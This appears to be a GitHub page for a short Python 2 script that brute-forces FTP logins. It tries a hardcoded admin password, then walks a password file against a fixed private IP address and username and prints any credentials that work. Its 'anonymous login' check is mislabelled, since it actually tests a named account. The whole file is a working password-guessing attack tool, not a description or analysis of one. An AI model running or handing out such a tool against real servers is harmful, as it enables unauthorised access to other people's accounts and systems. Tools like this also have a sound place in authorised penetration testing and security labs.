forked from B-and-w-sec/Python-Tools
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathftp-bruteforcer.py
51 lines (34 loc) · 1.54 KB
/
ftp-bruteforcer.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#!/usr/bin/python
import ftplib
## main function which will handle the brute force process!!
def config(host,username,password):
try:
ftp =ftplib.FTP(host)
ftp.login(username,password)
ftp.quit()
return True
except:
return False
def main():
host = "192.168.43.224"
username = "ashish"
passFile ="password.txt"
## check whether anonymous login enabled or not!
if config(host,"admin","admin@123"):
print "[+] Anonymous Login Successfull!"
exit(0)
else:
print "[+] Anonymous Login Failed!"
## if the anonymous login failes let brute force now!
print "[+] BruteForce Started on: " + host
## lets open our password file and read the passwords from it and bruteforce
passwordsfile = open(passFile,'r')
for password in passwordsfile.readlines():
password = password.strip('\r').strip('\n')
if config(host,username,password):
print "[+] Brute Force Successfull: " + " username: " + username + " Password: " +str(password)
exit(0)
else:
print "[+] Brute Force Failed!" + " username: " + username + " Password: " +str(password)
if __name__ == "__main__":
main()